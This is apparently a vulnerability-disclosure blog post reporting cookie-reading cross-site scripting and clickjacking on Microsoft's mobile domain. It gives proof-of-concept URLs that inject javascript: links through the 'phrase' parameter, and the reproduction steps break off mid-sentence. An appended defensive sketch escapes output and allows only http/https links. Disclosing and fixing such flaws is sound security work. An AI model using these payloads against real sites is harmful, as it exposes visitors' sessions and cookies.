
Showing posts from February, 2014

XSS in Microsoft mobile domain

Cookie XSS in the Microsoft mobile domain. The domain also has an open X-Frame vulnerability that allows clickjacking.

Domain: m.microsoft.com

The steps to reproduce the issue are the same for both PoC URLs, so I am sending both URLs and giving the steps using one of them.

PoC URLs:

1. http://m.microsoft.com/showcase/en/US/Search.mspx?a=results&mid=3900&phrase=%5burl%3djavascript:alert(document.cookie)%5dClick%20here%20to%20see%20Result%5b/url%5d&Search =
2. http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result[/url ]

Vulnerable parameter: phrase=

Steps to reproduce the issue

PoC URL: http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result[/url ]

When a user opens this URL, it gives a result on the Microsoft site like
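
A defensive sketch of the fix for the phrase= issue above, added here as an example and not taken from the original post or from Microsoft's code. It assumes the search page turns [url=...]label[/url] markup in the decoded phrase value into a link; the names renderPhrase, safeHref, escapeHtml and ALLOWED_SCHEMES are hypothetical.

```javascript
// Added example: render [url=...]label[/url] markup from an untrusted
// "phrase" value without letting script-bearing schemes reach an href.
// All names here are hypothetical; this is not the site's own code.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Escape text for both HTML element content and quoted attribute values.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Return a normalised absolute http(s) URL, or null for anything else.
// Parsing with the WHATWG URL parser (instead of a regex on the raw string)
// matters: it lowercases the scheme and drops embedded tabs and newlines,
// the same way a browser does before it decides which scheme a link has.
function safeHref(raw) {
  let url;
  try {
    url = new URL(raw.trim());
  } catch {
    return null; // relative or malformed target
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Convert the decoded phrase to HTML. Everything outside a [url] tag is
// escaped; a tag with a disallowed target keeps its label but gets no link.
function renderPhrase(phrase) {
  const tag = /\[url=([^\]]*)\]([\s\S]*?)\[\/url\s*\]/gi;
  let out = "";
  let last = 0;
  for (const m of phrase.matchAll(tag)) {
    out += escapeHtml(phrase.slice(last, m.index));
    const href = safeHref(m[1]);
    const label = escapeHtml(m[2]);
    out += href
      ? `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${label}</a>`
      : label;
    last = m.index + m[0].length;
  }
  return out + escapeHtml(phrase.slice(last));
}
```

With this rendering, the decoded phrase value from the second PoC URL comes out as plain text with no anchor element.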